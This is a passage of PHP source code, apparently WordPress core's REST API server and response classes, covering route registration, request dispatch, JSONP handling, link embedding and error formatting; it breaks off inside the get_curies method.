/** * REST API: WP_REST_Server class * * @package WordPress * @subpackage REST_API * @since 4.4.0 */ /** * Core class used to implement the WordPress REST API server. * * @since 4.4.0 */ class WP_REST_Server { /** * Alias for GET transport method. * * @since 4.4.0 * @var string */ const READABLE = 'GET'; /** * Alias for POST transport method. * * @since 4.4.0 * @var string */ const CREATABLE = 'POST'; /** * Alias for POST, PUT, PATCH transport methods together. * * @since 4.4.0 * @var string */ const EDITABLE = 'POST, PUT, PATCH'; /** * Alias for DELETE transport method. * * @since 4.4.0 * @var string */ const DELETABLE = 'DELETE'; /** * Alias for GET, POST, PUT, PATCH & DELETE transport methods together. * * @since 4.4.0 * @var string */ const ALLMETHODS = 'GET, POST, PUT, PATCH, DELETE'; /** * Namespaces registered to the server. * * @since 4.4.0 * @access protected * @var array */ protected $namespaces = array(); /** * Endpoints registered to the server. * * @since 4.4.0 * @access protected * @var array */ protected $endpoints = array(); /** * Options defined for the routes. * * @since 4.4.0 * @access protected * @var array */ protected $route_options = array(); /** * Instantiates the REST server. * * @since 4.4.0 * @access public */ public function __construct() { $this->endpoints = array( // Meta endpoints. '/' => array( 'callback' => array( $this, 'get_index' ), 'methods' => 'GET', 'args' => array( 'context' => array( 'default' => 'view', ), ), ), ); } /** * Checks the authentication headers if supplied. * * @since 4.4.0 * @access public * * @return WP_Error|null WP_Error indicates unsuccessful login, null indicates successful * or no authentication provided */ public function check_authentication() { /** * Pass an authentication error to the API * * This is used to pass a WP_Error from an authentication method back to * the API. * * Authentication methods should check first if they're being used, as * multiple authentication methods can be enabled on a site (cookies, * HTTP basic auth, OAuth). If the authentication method hooked in is * not actually being attempted, null should be returned to indicate * another authentication method should check instead. Similarly, * callbacks should ensure the value is `null` before checking for * errors. * * A WP_Error instance can be returned if an error occurs, and this should * match the format used by API methods internally (that is, the `status` * data should be used). A callback can return `true` to indicate that * the authentication method was used, and it succeeded. * * @since 4.4.0 * * @param WP_Error|null|bool WP_Error if authentication error, null if authentication * method wasn't used, true if authentication succeeded. */ return apply_filters( 'rest_authentication_errors', null ); } /** * Converts an error to a response object. * * This iterates over all error codes and messages to change it into a flat * array. This enables simpler client behaviour, as it is represented as a * list in JSON rather than an object/map. * * @since 4.4.0 * @access protected * * @param WP_Error $error WP_Error instance. * @return WP_REST_Response List of associative arrays with code and message keys. */ protected function error_to_response( $error ) { $error_data = $error->get_error_data(); if ( is_array( $error_data ) && isset( $error_data['status'] ) ) { $status = $error_data['status']; } else { $status = 500; } $errors = array(); foreach ( (array) $error->errors as $code => $messages ) { foreach ( (array) $messages as $message ) { $errors[] = array( 'code' => $code, 'message' => $message, 'data' => $error->get_error_data( $code ) ); } } $data = $errors[0]; if ( count( $errors ) > 1 ) { // Remove the primary error. array_shift( $errors ); $data['additional_errors'] = $errors; } $response = new WP_REST_Response( $data, $status ); return $response; } /** * Retrieves an appropriate error representation in JSON. * * Note: This should only be used in WP_REST_Server::serve_request(), as it * cannot handle WP_Error internally. All callbacks and other internal methods * should instead return a WP_Error with the data set to an array that includes * a 'status' key, with the value being the HTTP status to send. * * @since 4.4.0 * @access protected * * @param string $code WP_Error-style code. * @param string $message Human-readable message. * @param int $status Optional. HTTP status code to send. Default null. * @return string JSON representation of the error */ protected function json_error( $code, $message, $status = null ) { if ( $status ) { $this->set_status( $status ); } $error = compact( 'code', 'message' ); return wp_json_encode( $error ); } /** * Handles serving an API request. * * Matches the current server URI to a route and runs the first matching * callback then outputs a JSON representation of the returned value. * * @since 4.4.0 * @access public * * @see WP_REST_Server::dispatch() * * @param string $path Optional. The request route. If not set, `$_SERVER['PATH_INFO']` will be used. * Default null. * @return false|null Null if not served and a HEAD request, false otherwise. */ public function serve_request( $path = null ) { $content_type = isset( $_GET['_jsonp'] ) ? 'application/javascript' : 'application/json'; $this->send_header( 'Content-Type', $content_type . '; charset=' . get_option( 'blog_charset' ) ); $this->send_header( 'X-Robots-Tag', 'noindex' ); $api_root = get_rest_url(); if ( ! empty( $api_root ) ) { $this->send_header( 'Link', '<' . esc_url_raw( $api_root ) . '>; rel="https://api.w.org/"' ); } /* * Mitigate possible JSONP Flash attacks. * * https://miki.it/blog/2014/7/8/abusing-jsonp-with-rosetta-flash/ */ $this->send_header( 'X-Content-Type-Options', 'nosniff' ); $this->send_header( 'Access-Control-Expose-Headers', 'X-WP-Total, X-WP-TotalPages' ); $this->send_header( 'Access-Control-Allow-Headers', 'Authorization' ); /** * Send nocache headers on authenticated requests. * * @since 4.4.0 * * @param bool $rest_send_nocache_headers Whether to send no-cache headers. */ $send_no_cache_headers = apply_filters( 'rest_send_nocache_headers', is_user_logged_in() ); if ( $send_no_cache_headers ) { foreach ( wp_get_nocache_headers() as $header => $header_value ) { $this->send_header( $header, $header_value ); } } /** * Filters whether the REST API is enabled. * * @since 4.4.0 * * @param bool $rest_enabled Whether the REST API is enabled. Default true. */ $enabled = apply_filters( 'rest_enabled', true ); /** * Filters whether jsonp is enabled. * * @since 4.4.0 * * @param bool $jsonp_enabled Whether jsonp is enabled. Default true. */ $jsonp_enabled = apply_filters( 'rest_jsonp_enabled', true ); $jsonp_callback = null; if ( ! $enabled ) { echo $this->json_error( 'rest_disabled', __( 'The REST API is disabled on this site.' ), 404 ); return false; } if ( isset( $_GET['_jsonp'] ) ) { if ( ! $jsonp_enabled ) { echo $this->json_error( 'rest_callback_disabled', __( 'JSONP support is disabled on this site.' ), 400 ); return false; } $jsonp_callback = $_GET['_jsonp']; if ( ! wp_check_jsonp_callback( $jsonp_callback ) ) { echo $this->json_error( 'rest_callback_invalid', __( 'The JSONP callback function is invalid.' ), 400 ); return false; } } if ( empty( $path ) ) { if ( isset( $_SERVER['PATH_INFO'] ) ) { $path = $_SERVER['PATH_INFO']; } else { $path = '/'; } } $request = new WP_REST_Request( $_SERVER['REQUEST_METHOD'], $path ); $request->set_query_params( wp_unslash( $_GET ) ); $request->set_body_params( wp_unslash( $_POST ) ); $request->set_file_params( $_FILES ); $request->set_headers( $this->get_headers( wp_unslash( $_SERVER ) ) ); $request->set_body( $this->get_raw_data() ); /* * HTTP method override for clients that can't use PUT/PATCH/DELETE. First, we check * $_GET['_method']. If that is not set, we check for the HTTP_X_HTTP_METHOD_OVERRIDE * header. */ if ( isset( $_GET['_method'] ) ) { $request->set_method( $_GET['_method'] ); } elseif ( isset( $_SERVER['HTTP_X_HTTP_METHOD_OVERRIDE'] ) ) { $request->set_method( $_SERVER['HTTP_X_HTTP_METHOD_OVERRIDE'] ); } $result = $this->check_authentication(); if ( ! is_wp_error( $result ) ) { $result = $this->dispatch( $request ); } // Normalize to either WP_Error or WP_REST_Response... $result = rest_ensure_response( $result ); // ...then convert WP_Error across. if ( is_wp_error( $result ) ) { $result = $this->error_to_response( $result ); } /** * Filters the API response. * * Allows modification of the response before returning. * * @since 4.4.0 * @since 4.5.0 Applied to embedded responses. * * @param WP_HTTP_Response $result Result to send to the client. Usually a WP_REST_Response. * @param WP_REST_Server $this Server instance. * @param WP_REST_Request $request Request used to generate the response. */ $result = apply_filters( 'rest_post_dispatch', rest_ensure_response( $result ), $this, $request ); // Wrap the response in an envelope if asked for. if ( isset( $_GET['_envelope'] ) ) { $result = $this->envelope_response( $result, isset( $_GET['_embed'] ) ); } // Send extra data from response objects. $headers = $result->get_headers(); $this->send_headers( $headers ); $code = $result->get_status(); $this->set_status( $code ); /** * Filters whether the request has already been served. * * Allow sending the request manually - by returning true, the API result * will not be sent to the client. * * @since 4.4.0 * * @param bool $served Whether the request has already been served. * Default false. * @param WP_HTTP_Response $result Result to send to the client. Usually a WP_REST_Response. * @param WP_REST_Request $request Request used to generate the response. * @param WP_REST_Server $this Server instance. */ $served = apply_filters( 'rest_pre_serve_request', false, $result, $request, $this ); if ( ! $served ) { if ( 'HEAD' === $request->get_method() ) { return null; } // Embed links inside the request. $result = $this->response_to_data( $result, isset( $_GET['_embed'] ) ); $result = wp_json_encode( $result ); $json_error_message = $this->get_json_last_error(); if ( $json_error_message ) { $json_error_obj = new WP_Error( 'rest_encode_error', $json_error_message, array( 'status' => 500 ) ); $result = $this->error_to_response( $json_error_obj ); $result = wp_json_encode( $result->data[0] ); } if ( $jsonp_callback ) { // Prepend '/**/' to mitigate possible JSONP Flash attacks // https://miki.it/blog/2014/7/8/abusing-jsonp-with-rosetta-flash/ echo '/**/' . $jsonp_callback . '(' . $result . ')'; } else { echo $result; } } return null; } /** * Converts a response to data to send. * * @since 4.4.0 * @access public * * @param WP_REST_Response $response Response object. * @param bool $embed Whether links should be embedded. * @return array { * Data with sub-requests embedded. * * @type array [$_links] Links. * @type array [$_embedded] Embeddeds. * } */ public function response_to_data( $response, $embed ) { $data = $response->get_data(); $links = $this->get_compact_response_links( $response ); if ( ! empty( $links ) ) { // Convert links to part of the data. $data['_links'] = $links; } if ( $embed ) { // Determine if this is a numeric array. if ( wp_is_numeric_array( $data ) ) { $data = array_map( array( $this, 'embed_links' ), $data ); } else { $data = $this->embed_links( $data ); } } return $data; } /** * Retrieves links from a response. * * Extracts the links from a response into a structured hash, suitable for * direct output. * * @since 4.4.0 * @access public * @static * * @param WP_REST_Response $response Response to extract links from. * @return array Map of link relation to list of link hashes. */ public static function get_response_links( $response ) { $links = $response->get_links(); if ( empty( $links ) ) { return array(); } // Convert links to part of the data. $data = array(); foreach ( $links as $rel => $items ) { $data[ $rel ] = array(); foreach ( $items as $item ) { $attributes = $item['attributes']; $attributes['href'] = $item['href']; $data[ $rel ][] = $attributes; } } return $data; } /** * Retrieves the CURIEs (compact URIs) used for relations. * * Extracts the links from a response into a structured hash, suitable for * direct output. * * @since 4.5.0 * @access public * @static * * @param WP_REST_Response $response Response to extract links from. * @return array Map of link relation to list of link hashes. */ public static function get_compact_response_links( $response ) { $links = self::get_response_links( $response ); if ( empty( $links ) ) { return array(); } $curies = $response->get_curies(); $used_curies = array(); foreach ( $links as $rel => $items ) { // Convert $rel URIs to their compact versions if they exist. foreach ( $curies as $curie ) { $href_prefix = substr( $curie['href'], 0, strpos( $curie['href'], '{rel}' ) ); if ( strpos( $rel, $href_prefix ) !== 0 ) { continue; } // Relation now changes from '$uri' to '$curie:$relation' $rel_regex = str_replace( '\{rel\}', '(.+)', preg_quote( $curie['href'], '!' ) ); preg_match( '!' . $rel_regex . '!', $rel, $matches ); if ( $matches ) { $new_rel = $curie['name'] . ':' . $matches[1]; $used_curies[ $curie['name'] ] = $curie; $links[ $new_rel ] = $items; unset( $links[ $rel ] ); break; } } } // Push the curies onto the start of the links array. if ( $used_curies ) { $links['curies'] = array_values( $used_curies ); } return $links; } /** * Embeds the links from the data into the request. * * @since 4.4.0 * @access protected * * @param array $data Data from the request. * @return array { * Data with sub-requests embedded. * * @type array [$_links] Links. * @type array [$_embedded] Embeddeds. * } */ protected function embed_links( $data ) { if ( empty( $data['_links'] ) ) { return $data; } $embedded = array(); foreach ( $data['_links'] as $rel => $links ) { // Ignore links to self, for obvious reasons. if ( 'self' === $rel ) { continue; } $embeds = array(); foreach ( $links as $item ) { // Determine if the link is embeddable. if ( empty( $item['embeddable'] ) ) { // Ensure we keep the same order. $embeds[] = array(); continue; } // Run through our internal routing and serve. $request = WP_REST_Request::from_url( $item['href'] ); if ( ! $request ) { $embeds[] = array(); continue; } // Embedded resources get passed context=embed. if ( empty( $request['context'] ) ) { $request['context'] = 'embed'; } $response = $this->dispatch( $request ); /** This filter is documented in wp-includes/rest-api/class-wp-rest-server.php */ $response = apply_filters( 'rest_post_dispatch', rest_ensure_response( $response ), $this, $request ); $embeds[] = $this->response_to_data( $response, false ); } // Determine if any real links were found. $has_links = count( array_filter( $embeds ) ); if ( $has_links ) { $embedded[ $rel ] = $embeds; } } if ( ! empty( $embedded ) ) { $data['_embedded'] = $embedded; } return $data; } /** * Wraps the response in an envelope. * * The enveloping technique is used to work around browser/client * compatibility issues. Essentially, it converts the full HTTP response to * data instead. * * @since 4.4.0 * @access public * * @param WP_REST_Response $response Response object. * @param bool $embed Whether links should be embedded. * @return WP_REST_Response New response with wrapped data */ public function envelope_response( $response, $embed ) { $envelope = array( 'body' => $this->response_to_data( $response, $embed ), 'status' => $response->get_status(), 'headers' => $response->get_headers(), ); /** * Filters the enveloped form of a response. * * @since 4.4.0 * * @param array $envelope Envelope data. * @param WP_REST_Response $response Original response data. */ $envelope = apply_filters( 'rest_envelope_response', $envelope, $response ); // Ensure it's still a response and return. return rest_ensure_response( $envelope ); } /** * Registers a route to the server. * * @since 4.4.0 * @access public * * @param string $namespace Namespace. * @param string $route The REST route. * @param array $route_args Route arguments. * @param bool $override Optional. Whether the route should be overriden if it already exists. * Default false. */ public function register_route( $namespace, $route, $route_args, $override = false ) { if ( ! isset( $this->namespaces[ $namespace ] ) ) { $this->namespaces[ $namespace ] = array(); $this->register_route( $namespace, '/' . $namespace, array( array( 'methods' => self::READABLE, 'callback' => array( $this, 'get_namespace_index' ), 'args' => array( 'namespace' => array( 'default' => $namespace, ), 'context' => array( 'default' => 'view', ), ), ), ) ); } // Associative to avoid double-registration. $this->namespaces[ $namespace ][ $route ] = true; $route_args['namespace'] = $namespace; if ( $override || empty( $this->endpoints[ $route ] ) ) { $this->endpoints[ $route ] = $route_args; } else { $this->endpoints[ $route ] = array_merge( $this->endpoints[ $route ], $route_args ); } } /** * Retrieves the route map. * * The route map is an associative array with path regexes as the keys. The * value is an indexed array with the callback function/method as the first * item, and a bitmask of HTTP methods as the second item (see the class * constants). * * Each route can be mapped to more than one callback by using an array of * the indexed arrays. This allows mapping e.g. GET requests to one callback * and POST requests to another. * * Note that the path regexes (array keys) must have @ escaped, as this is * used as the delimiter with preg_match() * * @since 4.4.0 * @access public * * @return array `'/path/regex' => array( $callback, $bitmask )` or * `'/path/regex' => array( array( $callback, $bitmask ), ...)`. */ public function get_routes() { /** * Filters the array of available endpoints. * * @since 4.4.0 * * @param array $endpoints The available endpoints. An array of matching regex patterns, each mapped * to an array of callbacks for the endpoint. These take the format * `'/path/regex' => array( $callback, $bitmask )` or * `'/path/regex' => array( array( $callback, $bitmask ). */ $endpoints = apply_filters( 'rest_endpoints', $this->endpoints ); // Normalise the endpoints. $defaults = array( 'methods' => '', 'accept_json' => false, 'accept_raw' => false, 'show_in_index' => true, 'args' => array(), ); foreach ( $endpoints as $route => &$handlers ) { if ( isset( $handlers['callback'] ) ) { // Single endpoint, add one deeper. $handlers = array( $handlers ); } if ( ! isset( $this->route_options[ $route ] ) ) { $this->route_options[ $route ] = array(); } foreach ( $handlers as $key => &$handler ) { if ( ! is_numeric( $key ) ) { // Route option, move it to the options. $this->route_options[ $route ][ $key ] = $handler; unset( $handlers[ $key ] ); continue; } $handler = wp_parse_args( $handler, $defaults ); // Allow comma-separated HTTP methods. if ( is_string( $handler['methods'] ) ) { $methods = explode( ',', $handler['methods'] ); } else if ( is_array( $handler['methods'] ) ) { $methods = $handler['methods']; } else { $methods = array(); } $handler['methods'] = array(); foreach ( $methods as $method ) { $method = strtoupper( trim( $method ) ); $handler['methods'][ $method ] = true; } } } return $endpoints; } /** * Retrieves namespaces registered on the server. * * @since 4.4.0 * @access public * * @return array List of registered namespaces. */ public function get_namespaces() { return array_keys( $this->namespaces ); } /** * Retrieves specified options for a route. * * @since 4.4.0 * @access public * * @param string $route Route pattern to fetch options for. * @return array|null Data as an associative array if found, or null if not found. */ public function get_route_options( $route ) { if ( ! isset( $this->route_options[ $route ] ) ) { return null; } return $this->route_options[ $route ]; } /** * Matches the request to a callback and call it. * * @since 4.4.0 * @access public * * @param WP_REST_Request $request Request to attempt dispatching. * @return WP_REST_Response Response returned by the callback. */ public function dispatch( $request ) { /** * Filters the pre-calculated result of a REST dispatch request. * * Allow hijacking the request before dispatching by returning a non-empty. The returned value * will be used to serve the request instead. * * @since 4.4.0 * * @param mixed $result Response to replace the requested version with. Can be anything * a normal endpoint can return, or null to not hijack the request. * @param WP_REST_Server $this Server instance. * @param WP_REST_Request $request Request used to generate the response. */ $result = apply_filters( 'rest_pre_dispatch', null, $this, $request ); if ( ! empty( $result ) ) { return $result; } $method = $request->get_method(); $path = $request->get_route(); foreach ( $this->get_routes() as $route => $handlers ) { $match = preg_match( '@^' . $route . '$@i', $path, $args ); if ( ! $match ) { continue; } foreach ( $handlers as $handler ) { $callback = $handler['callback']; $response = null; // Fallback to GET method if no HEAD method is registered. $checked_method = $method; if ( 'HEAD' === $method && empty( $handler['methods']['HEAD'] ) ) { $checked_method = 'GET'; } if ( empty( $handler['methods'][ $checked_method ] ) ) { continue; } if ( ! is_callable( $callback ) ) { $response = new WP_Error( 'rest_invalid_handler', __( 'The handler for the route is invalid' ), array( 'status' => 500 ) ); } if ( ! is_wp_error( $response ) ) { // Remove the redundant preg_match argument. unset( $args[0] ); $request->set_url_params( $args ); $request->set_attributes( $handler ); $defaults = array(); foreach ( $handler['args'] as $arg => $options ) { if ( isset( $options['default'] ) ) { $defaults[ $arg ] = $options['default']; } } $request->set_default_params( $defaults ); $check_required = $request->has_valid_params(); if ( is_wp_error( $check_required ) ) { $response = $check_required; } $request->sanitize_params(); } if ( ! is_wp_error( $response ) ) { // Check permission specified on the route. if ( ! empty( $handler['permission_callback'] ) ) { $permission = call_user_func( $handler['permission_callback'], $request ); if ( is_wp_error( $permission ) ) { $response = $permission; } else if ( false === $permission || null === $permission ) { $response = new WP_Error( 'rest_forbidden', __( 'Sorry, you are not allowed to do that.' ), array( 'status' => 403 ) ); } } } if ( ! is_wp_error( $response ) ) { /** * Filters the REST dispatch request result. * * Allow plugins to override dispatching the request. * * @since 4.4.0 * @since 4.5.0 Added `$route` and `$handler` parameters. * * @param bool $dispatch_result Dispatch result, will be used if not empty. * @param WP_REST_Request $request Request used to generate the response. * @param string $route Route matched for the request. * @param array $handler Route handler used for the request. */ $dispatch_result = apply_filters( 'rest_dispatch_request', null, $request, $route, $handler ); // Allow plugins to halt the request via this filter. if ( null !== $dispatch_result ) { $response = $dispatch_result; } else { $response = call_user_func( $callback, $request ); } } if ( is_wp_error( $response ) ) { $response = $this->error_to_response( $response ); } else { $response = rest_ensure_response( $response ); } $response->set_matched_route( $route ); $response->set_matched_handler( $handler ); return $response; } } return $this->error_to_response( new WP_Error( 'rest_no_route', __( 'No route was found matching the URL and request method' ), array( 'status' => 404 ) ) ); } /** * Returns if an error occurred during most recent JSON encode/decode. * * Strings to be translated will be in format like * "Encoding error: Maximum stack depth exceeded". * * @since 4.4.0 * @access protected * * @return bool|string Boolean false or string error message. */ protected function get_json_last_error() { // See https://core.trac.wordpress.org/ticket/27799. if ( ! function_exists( 'json_last_error' ) ) { return false; } $last_error_code = json_last_error(); if ( ( defined( 'JSON_ERROR_NONE' ) && JSON_ERROR_NONE === $last_error_code ) || empty( $last_error_code ) ) { return false; } return json_last_error_msg(); } /** * Retrieves the site index. * * This endpoint describes the capabilities of the site. * * @since 4.4.0 * @access public * * @param array $request { * Request. * * @type string $context Context. * } * @return array Index entity */ public function get_index( $request ) { // General site data. $available = array( 'name' => get_option( 'blogname' ), 'description' => get_option( 'blogdescription' ), 'url' => get_option( 'siteurl' ), 'home' => home_url(), 'namespaces' => array_keys( $this->namespaces ), 'authentication' => array(), 'routes' => $this->get_data_for_routes( $this->get_routes(), $request['context'] ), ); $response = new WP_REST_Response( $available ); $response->add_link( 'help', 'http://v2.wp-api.org/' ); /** * Filters the API root index data. * * This contains the data describing the API. This includes information * about supported authentication schemes, supported namespaces, routes * available on the API, and a small amount of data about the site. * * @since 4.4.0 * * @param WP_REST_Response $response Response data. */ return apply_filters( 'rest_index', $response ); } /** * Retrieves the index for a namespace. * * @since 4.4.0 * @access public * * @param WP_REST_Request $request REST request instance. * @return WP_REST_Response|WP_Error WP_REST_Response instance if the index was found, * WP_Error if the namespace isn't set. */ public function get_namespace_index( $request ) { $namespace = $request['namespace']; if ( ! isset( $this->namespaces[ $namespace ] ) ) { return new WP_Error( 'rest_invalid_namespace', __( 'The specified namespace could not be found.' ), array( 'status' => 404 ) ); } $routes = $this->namespaces[ $namespace ]; $endpoints = array_intersect_key( $this->get_routes(), $routes ); $data = array( 'namespace' => $namespace, 'routes' => $this->get_data_for_routes( $endpoints, $request['context'] ), ); $response = rest_ensure_response( $data ); // Link to the root index. $response->add_link( 'up', rest_url( '/' ) ); /** * Filters the namespace index data. * * This typically is just the route data for the namespace, but you can * add any data you'd like here. * * @since 4.4.0 * * @param WP_REST_Response $response Response data. * @param WP_REST_Request $request Request data. The namespace is passed as the 'namespace' parameter. */ return apply_filters( 'rest_namespace_index', $response, $request ); } /** * Retrieves the publicly-visible data for routes. * * @since 4.4.0 * @access public * * @param array $routes Routes to get data for. * @param string $context Optional. Context for data. Accepts 'view' or 'help'. Default 'view'. * @return array Route data to expose in indexes. */ public function get_data_for_routes( $routes, $context = 'view' ) { $available = array(); // Find the available routes. foreach ( $routes as $route => $callbacks ) { $data = $this->get_data_for_route( $route, $callbacks, $context ); if ( empty( $data ) ) { continue; } /** * Filters the REST endpoint data. * * @since 4.4.0 * * @param WP_REST_Request $request Request data. The namespace is passed as the 'namespace' parameter. */ $available[ $route ] = apply_filters( 'rest_endpoints_description', $data ); } /** * Filters the publicly-visible data for routes. * * This data is exposed on indexes and can be used by clients or * developers to investigate the site and find out how to use it. It * acts as a form of self-documentation. * * @since 4.4.0 * * @param array $available Map of route to route data. * @param array $routes Internal route data as an associative array. */ return apply_filters( 'rest_route_data', $available, $routes ); } /** * Retrieves publicly-visible data for the route. * * @since 4.4.0 * @access public * * @param string $route Route to get data for. * @param array $callbacks Callbacks to convert to data. * @param string $context Optional. Context for the data. Accepts 'view' or 'help'. Default 'view'. * @return array|null Data for the route, or null if no publicly-visible data. */ public function get_data_for_route( $route, $callbacks, $context = 'view' ) { $data = array( 'namespace' => '', 'methods' => array(), 'endpoints' => array(), ); if ( isset( $this->route_options[ $route ] ) ) { $options = $this->route_options[ $route ]; if ( isset( $options['namespace'] ) ) { $data['namespace'] = $options['namespace']; } if ( isset( $options['schema'] ) && 'help' === $context ) { $data['schema'] = call_user_func( $options['schema'] ); } } $route = preg_replace( '#\(\?P<(\w+?)>.*?\)#', '{$1}', $route ); foreach ( $callbacks as $callback ) { // Skip to the next route if any callback is hidden. if ( empty( $callback['show_in_index'] ) ) { continue; } $data['methods'] = array_merge( $data['methods'], array_keys( $callback['methods'] ) ); $endpoint_data = array( 'methods' => array_keys( $callback['methods'] ), ); if ( isset( $callback['args'] ) ) { $endpoint_data['args'] = array(); foreach ( $callback['args'] as $key => $opts ) { $arg_data = array( 'required' => ! empty( $opts['required'] ), ); if ( isset( $opts['default'] ) ) { $arg_data['default'] = $opts['default']; } if ( isset( $opts['enum'] ) ) { $arg_data['enum'] = $opts['enum']; } if ( isset( $opts['description'] ) ) { $arg_data['description'] = $opts['description']; } $endpoint_data['args'][ $key ] = $arg_data; } } $data['endpoints'][] = $endpoint_data; // For non-variable routes, generate links. if ( strpos( $route, '{' ) === false ) { $data['_links'] = array( 'self' => rest_url( $route ), ); } } if ( empty( $data['methods'] ) ) { // No methods supported, hide the route. return null; } return $data; } /** * Sends an HTTP status code. * * @since 4.4.0 * @access protected * * @param int $code HTTP status. */ protected function set_status( $code ) { status_header( $code ); } /** * Sends an HTTP header. * * @since 4.4.0 * @access public * * @param string $key Header key. * @param string $value Header value. */ public function send_header( $key, $value ) { /* * Sanitize as per RFC2616 (Section 4.2): * * Any LWS that occurs between field-content MAY be replaced with a * single SP before interpreting the field value or forwarding the * message downstream. */ $value = preg_replace( '/\s+/', ' ', $value ); header( sprintf( '%s: %s', $key, $value ) ); } /** * Sends multiple HTTP headers. * * @since 4.4.0 * @access public * * @param array $headers Map of header name to header value. */ public function send_headers( $headers ) { foreach ( $headers as $key => $value ) { $this->send_header( $key, $value ); } } /** * Retrieves the raw request entity (body). * * @since 4.4.0 * @access public * * @global string $HTTP_RAW_POST_DATA Raw post data. * * @return string Raw request data. */ public static function get_raw_data() { global $HTTP_RAW_POST_DATA; /* * A bug in PHP < 5.2.2 makes $HTTP_RAW_POST_DATA not set by default, * but we can do it ourself. */ if ( ! isset( $HTTP_RAW_POST_DATA ) ) { $HTTP_RAW_POST_DATA = file_get_contents( 'php://input' ); } return $HTTP_RAW_POST_DATA; } /** * Extracts headers from a PHP-style $_SERVER array. * * @since 4.4.0 * @access public * * @param array $server Associative array similar to `$_SERVER`. * @return array Headers extracted from the input. */ public function get_headers( $server ) { $headers = array(); // CONTENT_* headers are not prefixed with HTTP_. $additional = array( 'CONTENT_LENGTH' => true, 'CONTENT_MD5' => true, 'CONTENT_TYPE' => true ); foreach ( $server as $key => $value ) { if ( strpos( $key, 'HTTP_' ) === 0 ) { $headers[ substr( $key, 5 ) ] = $value; } elseif ( isset( $additional[ $key ] ) ) { $headers[ $key ] = $value; } } return $headers; } } /** * REST API: WP_REST_Response class * * @package WordPress * @subpackage REST_API * @since 4.4.0 */ /** * Core class used to implement a REST response object. * * @since 4.4.0 * * @see WP_HTTP_Response */ class WP_REST_Response extends WP_HTTP_Response { /** * Links related to the response. * * @since 4.4.0 * @access protected * @var array */ protected $links = array(); /** * The route that was to create the response. * * @since 4.4.0 * @access protected * @var string */ protected $matched_route = ''; /** * The handler that was used to create the response. * * @since 4.4.0 * @access protected * @var null|array */ protected $matched_handler = null; /** * Adds a link to the response. * * @internal The $rel parameter is first, as this looks nicer when sending multiple. * * @since 4.4.0 * @access public * * @link https://tools.ietf.org/html/rfc5988 * @link https://www.iana.org/assignments/link-relations/link-relations.xml * * @param string $rel Link relation. Either an IANA registered type, * or an absolute URL. * @param string $href Target URI for the link. * @param array $attributes Optional. Link parameters to send along with the URL. Default empty array. */ public function add_link( $rel, $href, $attributes = array() ) { if ( empty( $this->links[ $rel ] ) ) { $this->links[ $rel ] = array(); } if ( isset( $attributes['href'] ) ) { // Remove the href attribute, as it's used for the main URL. unset( $attributes['href'] ); } $this->links[ $rel ][] = array( 'href' => $href, 'attributes' => $attributes, ); } /** * Removes a link from the response. * * @since 4.4.0 * @access public * * @param string $rel Link relation. Either an IANA registered type, or an absolute URL. * @param string $href Optional. Only remove links for the relation matching the given href. * Default null. */ public function remove_link( $rel, $href = null ) { if ( ! isset( $this->links[ $rel ] ) ) { return; } if ( $href ) { $this->links[ $rel ] = wp_list_filter( $this->links[ $rel ], array( 'href' => $href ), 'NOT' ); } else { $this->links[ $rel ] = array(); } if ( ! $this->links[ $rel ] ) { unset( $this->links[ $rel ] ); } } /** * Adds multiple links to the response. * * Link data should be an associative array with link relation as the key. * The value can either be an associative array of link attributes * (including `href` with the URL for the response), or a list of these * associative arrays. * * @since 4.4.0 * @access public * * @param array $links Map of link relation to list of links. */ public function add_links( $links ) { foreach ( $links as $rel => $set ) { // If it's a single link, wrap with an array for consistent handling. if ( isset( $set['href'] ) ) { $set = array( $set ); } foreach ( $set as $attributes ) { $this->add_link( $rel, $attributes['href'], $attributes ); } } } /** * Retrieves links for the response. * * @since 4.4.0 * @access public * * @return array List of links. */ public function get_links() { return $this->links; } /** * Sets a single link header. * * @internal The $rel parameter is first, as this looks nicer when sending multiple. * * @since 4.4.0 * @access public * * @link https://tools.ietf.org/html/rfc5988 * @link https://www.iana.org/assignments/link-relations/link-relations.xml * * @param string $rel Link relation. Either an IANA registered type, or an absolute URL. * @param string $link Target IRI for the link. * @param array $other Optional. Other parameters to send, as an assocative array. * Default empty array. */ public function link_header( $rel, $link, $other = array() ) { $header = '<' . $link . '>; rel="' . $rel . '"'; foreach ( $other as $key => $value ) { if ( 'title' === $key ) { $value = '"' . $value . '"'; } $header .= '; ' . $key . '=' . $value; } $this->header( 'Link', $header, false ); } /** * Retrieves the route that was used. * * @since 4.4.0 * @access public * * @return string The matched route. */ public function get_matched_route() { return $this->matched_route; } /** * Sets the route (regex for path) that caused the response. * * @since 4.4.0 * @access public * * @param string $route Route name. */ public function set_matched_route( $route ) { $this->matched_route = $route; } /** * Retrieves the handler that was used to generate the response. * * @since 4.4.0 * @access public * * @return null|array The handler that was used to create the response. */ public function get_matched_handler() { return $this->matched_handler; } /** * Retrieves the handler that was responsible for generating the response. * * @since 4.4.0 * @access public * * @param array $handler The matched handler. */ public function set_matched_handler( $handler ) { $this->matched_handler = $handler; } /** * Checks if the response is an error, i.e. >= 400 response code. * * @since 4.4.0 * @access public * * @return bool Whether the response is an error. */ public function is_error() { return $this->get_status() >= 400; } /** * Retrieves a WP_Error object from the response. * * @since 4.4.0 * @access public * * @return WP_Error|null WP_Error or null on not an errored response. */ public function as_error() { if ( ! $this->is_error() ) { return null; } $error = new WP_Error; if ( is_array( $this->get_data() ) ) { $data = $this->get_data(); $error->add( $data['code'], $data['message'], $data['data'] ); if ( ! empty( $data['additional_errors'] ) ) { foreach( $data['additional_errors'] as $err ) { $error->add( $err['code'], $err['message'], $err['data'] ); } } } else { $error->add( $this->get_status(), '', array( 'status' => $this->get_status() ) ); } return $error; } /** * Retrieves the CURIEs (compact URIs) used for relations. * * @since 4.5.0 * @access public * * @return array Compact URIs. */ public function get_curies() { $curies = array( array( 'name' => 'wp', 'href' => 'https://api.w.org/{rel}', 'templated' => true, ), ); /** * Filters extra CURIEs available on API responses. * * CURIEs allow a shortened version of URI relations. This allows a more * usable form for custom relations than using the full URI. These work * similarly to how XML namespaces work. * * Registered CURIES need to specify a name and URI template. This will * automatically transform URI relations into their shortened version. * The shortened relation follows the format `{name}:{rel}`. `{rel}` in * the URI template will be replaced with the `{rel}` part of the * shortened relation. * * For example, a CURIE with name `example` and URI template * `http://w.org/{rel}` would transform a `http://w.org/term` relation * into `example:term`. * * Well-behaved clients should expand and normalise these back to their * full URI relation, however some naive clients may not resolve these * correctly, so adding new CURIEs may break backward compatibility. * * @since 4.5.0 * * @param array $additional Additional CURIEs to register with the API. */ $additional = apply_filters( 